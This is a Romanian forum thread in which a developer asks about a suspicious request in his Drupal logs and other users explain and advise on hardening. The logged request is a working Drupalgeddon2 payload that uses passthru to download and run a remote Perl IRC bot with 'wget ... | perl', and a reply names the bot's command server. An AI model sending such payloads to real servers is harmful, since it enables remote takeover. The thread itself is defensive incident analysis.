Jump to content
Mihaii8

Salutare tuturor, wget | perl

Recommended Posts

Sunt pasionat de securitate in ultima vreme si putin ingrijorat ..

 

Vin cu o intrebare pentru ca nu am reusit sa inteleg ce anume face acest script pe care l-am executat cand am facut decode, am vazut ulterior ca era redirectionat catre perl ..

a venit ca un POST pe o aplicatie de drupal  /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+217.61.110.181%2Fqwe%7Cperl&name%5B%23type%5D=markup

 

Poate cineva sa ma ajute sa inteleg ce face acest script perl ?

 

Multumesc,

Share this post


Link to post
Share on other sites

Incearca daca este prezenta o vulnerabilitate in drupal si executa prin functia passthru (php) doua comenzi:

 

- Descarca un script perl care este un bot de IRC utilizat pentru scanning, dos

- Executa acel script

 

Vulnerabilitatea despre care este vorba este aici: https://www.drupal.org/sa-core-2018-002

 

Serverul de IRC ruleaza pe adresa ip 82.165.172.97 / port 8080

 

# quick test
macbook:~$ nc -vvvv 82.165.172.97 8080
found 0 associations
found 1 connections:
     1:	flags=82<CONNECTED,PREFERRED>
	outif en0
	src 10.0.0.31 port 55610
	dst 82.165.172.97 port 8080
	rank info not available
	TCP aux info available

Connection to 82.165.172.97 port 8080 [tcp/http-alt] succeeded!
:irc.roirc.me NOTICE AUTH :*** Looking up your hostname...
:irc.roirc.me NOTICE AUTH :*** Found your hostname (cached)

Botul de irc nu are autentificare si tine cont doar de nick-ul celui ce da comenzile:

 

my @mast3rs = ("darkness","QuaD","AntMiner");

 

Procesul ce ruleaza in server apare ca "/usr/sbin/sshd". Singura diferenta este ca ruleaza pe userul sub care se executa php/apache

 

my @fakeps = ("/usr/sbin/sshd");

Scriptul perl e facut de portughezi prin 2001. A fost modificat in timp de tot felul de script kiddie.

  • Thanks 1
  • Upvote 7

Share this post


Link to post
Share on other sites

Marfa, pot sa stau linistit, am ultimul patch (si chiar asa, tot nu pot sa stau). Multumesc mult pentru explicatii.

As vrea sa invat sa securizez mai mult aplicatiile web pe care le dezvolt pentru ca incep sa apara din ce in ce mai multe loguri dubioase..

Edited by Mihaii8

Share this post


Link to post
Share on other sites
22 hours ago, Mihaii8 said:

Marfa, pot sa stau linistit, am ultimul patch (si chiar asa, tot nu pot sa stau). Multumesc mult pentru explicatii.

As vrea sa invat sa securizez mai mult aplicatiile web pe care le dezvolt pentru ca incep sa apara din ce in ce mai multe loguri dubioase..

Foloseste "disable_functions" si "open_basedir" in environmentul din care servesti site-ul web. Te scapa in mare parte de diverse chestii de genul. Ai putea face si un chroot.

Share this post


Link to post
Share on other sites
On 11/26/2018 at 1:10 AM, aelius said:

Foloseste "disable_functions" si "open_basedir" in environmentul din care servesti site-ul web. Te scapa in mare parte de diverse chestii de genul. Ai putea face si un chroot.

@aelius

era deja disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig, pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror, pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,

 

insa am mai adaugat phpinfo,dir,readfile,shell_exec,exec,virtual,passthru,proc_close,proc_get_status,proc_open,proc_terminate,system,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

 

am pus si open_basedir in fiecare vhost

 

..mersi de pont

Share this post


Link to post
Share on other sites

Ala e bash prompt, nu are legatura cu comanda executata. Pe user apare '$' iar pe superuser '#'.

Nu ai nevoie de superuser pentru a initializa conexiuni cu netcat. La listare se schimba putin treaba pentru ca pot fi restrictii diverse pentru porturile mai mici de 1024 (privileged ports)

Nu utilizati superuser (root) pentru "daily work".  Il folositi doar daca aveti de facut chestii administrative in sistem. Este unsafe.

 

Referinte:

http://man7.org/linux/man-pages/man7/capabilities.7.html ( CAP_NET_BIND_SERVICE )

https://tiswww.case.edu/php/chet/bash/bashref.html

  • Thanks 2
  • Upvote 3

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...